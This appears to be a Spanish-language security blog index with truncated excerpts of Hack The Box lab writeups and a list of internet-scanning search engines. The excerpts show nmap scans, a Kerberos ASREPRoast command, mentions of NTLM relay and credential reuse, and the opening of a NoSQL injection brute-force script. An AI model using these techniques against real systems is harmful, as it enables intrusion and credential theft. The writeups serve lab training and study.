Motores de búsqueda para bug hunters y red teamers.

Es una práctica muy útil analizar el segmento de nuestra empresa desde buscadores como estos, ya que nos permitirá identificar fallos, vulnerabilidades y malas configuraciones relacionados con la publicación de servicios al internet. A continuación una lista de buscadores para bug hunters o red teamers. https://censys.io https://www.shodan.io https://viz.greynoise.io/table https://zoomeye.org https://fofa.so https://app.binaryedge.io https://hunter.io https://wigle.net https://ghostproject.fr https://grep.app…

Writeup Obscurity Hack the Box

Punto de Apoyo Incial nmap -p- -T5 –open obscurity.htb Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT     STATE SERVICE 22/tcp   open  ssh 8080/tcp open  http-proxy Nmap done: 1 IP address (1 host up) scanned in 164.29 seconds nmap -sV -sC -p 8080 obscurity.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01…

Writeup Openadmin Hack the Box

Resumen: Explotando una vulnerabilidad de OpenNetAdmin se pudo obtener ejecución de comando en la máquina. Con este acceso se obtuvo credenciales de la base de datos, y por re uso de credenciales se pudo acceder al equipo por ssh, con este acceso se pudo ver una llave privada y acceder con un segundo usuario. Para…

Writeup Traverxec Hack The Box

Encontrando el user Todo empezó con un con una enumeración básica, y se determinó que la máquina Traverxec tiene abierto dos puertos. El 22 (ssh) y el 80 (http), de acuerdo a la salida de nmap, se puede ver que el puerto 80 tiene el servicio de http de nostromo en su versión 1.9.6. <service…

Writeup Forest Hack the Box

Nmap a forest.htb de la manera convencional. Enumerar usuarios como indica aquí. https://www.tarlogic.com/blog/como-atacar-kerberos/ O con el módulo smb-enum de metasploit. Con el resultado de nombres de usuario se elaboró el archivo username.txt. Se encontró el usuario svc-alfresco y se pudo determinar el hash de la credencial con el comando python GetNPUsers.py htb.local/ -usersfile usernames.txt -format…

Writeup Mango Hack the Box

Mango = MongoDB Revisar los certificados SSL y encontrar el nombre del host adecuado: https://staging-order.mango.htb Revisar el link https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection Elaborar un script para explotar NoSQLi #!/usr/bin/env python   import requests   import string   url = «http://staging-order.mango.htb/index.php»   headers = {«Host»: «staging-order.mango.htb»}   cookies = {«PHPSESSID»: «9k6j39np56td4vq3q4lg4eh95j»}   possible_chars = list(string.ascii_letters) + list(string.digits) + [«\\»+c…

Writeup Sauna Hack the Box

Resumen Aprovechando que la página contenía información del staff de trabajadores se pudo generar una lista de usuarios válidos, con esto se obtuvo un acceso sin privilegios elevados, sin embargo tenía un soporte legacy esto permitió usar la repetición NTLM (ntlmrelay) se pudo obtener credenciales privilegiadas. Punto de Apoyo Enumeramos de manera convencional Ver la…